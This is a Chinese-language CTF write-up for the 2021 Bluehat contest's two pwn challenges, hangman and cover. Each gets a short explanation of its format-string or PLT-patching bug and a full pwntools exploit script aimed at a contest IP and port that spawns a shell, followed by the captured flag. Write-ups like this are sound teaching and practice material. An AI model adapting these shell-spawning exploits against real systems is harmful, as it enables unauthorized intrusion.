2021 bluehat-s wp
好久没发过博客了,难得想起这个事情,适逢昨天刚打完比赛,👴就顺手发一篇吧
pwn
早上九点开赛,大概11点左右就ak了pwn(就两道pwn),然后都是在摸鱼了
附件传到百度网盘了,有兴趣的师傅可以下载来玩一下
链接: https://pan.baidu.com/s/1RLpfC0LEGPJkKif8COnNpg 密码: eq90
hangman
程序大致逻辑是,先输入一段字符串,随后输入字符,统计字符串中与该字符相等的字符数目,并将数目累加到局部变量上,当局部变量与字符串长度相等时,会赢得一轮游戏,并且存在一个格式化字符串漏洞,利用该漏洞泄漏libc基地址,栈地址,改写存放__libc_start_main+240的位置,将__libc_start_main+240改成one_gadget,然后正常结束程序即可getshell。脚本有时不能打通,运行多几次即可
exp
from pwn import*
import sys
# Path of the challenge binary; parsed once so that symbols can be looked up.
binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 33445
ip = '118.190.62.234'
port = 33445
# 'r' as the first argument selects the remote instance together with the libc
# shipped alongside the challenge; any other value runs the binary locally and
# uses elf.libc instead.
# NOTE(review): sys.argv[1] is read unconditionally, so invoking the script
# without any argument fails with IndexError before anything is started.
if sys.argv[1] == 'r':
    p = remote(ip,port)
    libc = ELF('./libc-2.23.so')
else :
    p = process(binary)
    libc = elf.libc
context.os = 'linux'
#context.log_level = 'debug'
context.arch = 'amd64'
# Short aliases over the pwntools tube API; pwn() below relies on sla, ru, rc,
# ss and irt, the others are unused in this file.
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
def pwn():
    """Drive the hangman challenge as described in the writeup above.

    Round one leaks two pointers through the format-string bug (a libc
    address and a stack address).  Rounds two and three each perform one
    two-byte ``%hn`` write so that the low and middle 16-bit halves of the
    chosen one_gadget address land at ``main_ret`` and ``main_ret+2``.  A
    final ordinary round lets the program run to its normal end.  Uses the
    module-level tube aliases; takes no parameters and returns nothing.
    """
    # gdb.attach(p,'b * ($rebase)(0x13C5)')
    # Leak format arguments 29 and 24 as pointers.  The word holds four 'p'
    # characters, so three guesses of 'p' reach its length of 12 and close
    # the round (per the win rule described in the writeup).
    sla('word:','%29$ppp%24$p')
    sla('letter:','p')
    sla('letter:','p')
    sla('letter:','p')
    ru('0x')
    leak = rc(12)
    lbase = int(leak,16)- 240 -libc.sym['__libc_start_main'] # __libc_start_main+240
    ss('LIBC:'+hex(lbase))
    ru('0x')
    leak = rc(12)
    # The second leak is a stack pointer; +8 is taken as the slot to rewrite.
    main_ret = int(leak,16)+8
    ss('main_ret:'+hex(main_ret))
    # 0x45226 is the first entry of the one_gadget listing at the bottom of
    # this file (constraint there: rax == NULL).
    one_gadget = 0x45226+lbase
    ss('one_gadget:'+hex(one_gadget))
    # Split the target into 16-bit halves for the %hn writes.  o3 is only
    # logged; no third write is performed below.
    o1 = one_gadget & 0xffff
    o2 = (one_gadget>>16) & 0xffff
    o3 = (one_gadget>>32) & 0xffff
    ss('o1:'+hex(o1))
    ss('o2:'+hex(o2))
    ss('o3:'+hex(o3))
    # Payload layout: '%<o1>c%15$hn', padded to exactly 24 bytes ('n' up to
    # 14, then 'a'), followed by the target address -- presumably so the
    # appended pointer sits at format argument 15 (see ``%15$hn``).
    payload = '%{0}c%15$hn'.format(o1)
    payload = payload.ljust(14,'n') # len = 14
    payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
    payload = payload.encode()
    payload += p64(main_ret)
    sla('word:',payload)
    # Guesses of 'a' to finish the round, as in round one.
    sla('letter:','a')
    sla('letter:','a')
    sla('letter:','a')
    # Same layout again for the next 16 bits, two bytes higher.
    payload = '%{0}c%15$hn'.format(o2)
    payload = payload.ljust(14,'n') # len = 14
    payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
    payload = payload.encode()
    payload += p64(main_ret+2)
    sla('word:',payload)
    sla('letter:','a')
    sla('letter:','a')
    sla('letter:','a')
    # One plain round, then hand the tube over to the user.
    sla('word:','a')
    sla('letter:','a')
    irt()
if __name__ == '__main__':
    pwn()
# one_gadget listing kept for reference; pwn() above uses the first offset
# (0x45226).  This bare string has no effect at runtime.
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
flag
flag{4e20e122-d87d-452e-b7ee-b88f5acf890f}
cover
程序开始读入5字节,前4字节为地址,可以将最后一字节,写入该地址中,程序最后会读入一段输入,并执行puts输出,攻击思路就是修改puts的plt表中的跳转代码,在跳转到got表时,程序会push一个偏移,只需将puts的偏移修改为system的偏移,即可劫持puts的plt表跳转到system,执行system('/bin/sh')
exp
from pwn import*
import sys
# Path of the challenge binary; parsed once for symbol lookups.
binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 12435
ip = '118.190.62.234'
port = 12435
# 'r' as the first argument selects the remote instance; any other value runs
# the binary locally.
# NOTE(review): sys.argv[1] is read unconditionally, so running the script
# with no argument fails with IndexError.  In remote mode ``libc`` is never
# assigned (the ELF line is commented out); pwn() below does not use it, so
# this is harmless here.
if sys.argv[1] == 'r':
    p = remote(ip,port)
    # libc = ELF('./libc.so.6')
else :
    p = process(binary)
    libc = elf.libc
context.os = 'linux'
# Debug logging is left enabled in this script (unlike the hangman one).
context.log_level = 'debug'
context.arch = 'amd64'
# Short aliases over the pwntools tube API; pwn() below relies on sa, sd and
# irt, the others are unused in this file.
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
# 0x080484D0 puts_got 0x80484dc \x80
def pwn():
    """Drive the cover challenge as described in the writeup above.

    Sends the 5-byte input the program reads first -- a 4-byte little-endian
    address (0x080484d7) followed by the single byte (0x30) the program
    writes there -- then the string handed to the program's final output
    call.  Uses the module-level tube aliases; no parameters, no return
    value.
    """
    # NOTE(review): this is a str literal, not bytes; whether \xd7 and \x84
    # reach the target as single raw bytes depends on the Python/pwntools
    # version this was run under (the hangman script calls .encode()
    # explicitly) -- confirm.
    sa('this','\xd7\x84\x04\x08\x30')
    # Fixed delay rather than waiting on a prompt before the second send.
    sleep(2)
    sd('/bin/sh\x00')
    irt()
# Entry point guard; the tube is already opened at import time above.
if __name__ == '__main__':
    pwn()
flag
flag{f7d89ad6-8c5a-4f0d-ae41-2410ab8855b6}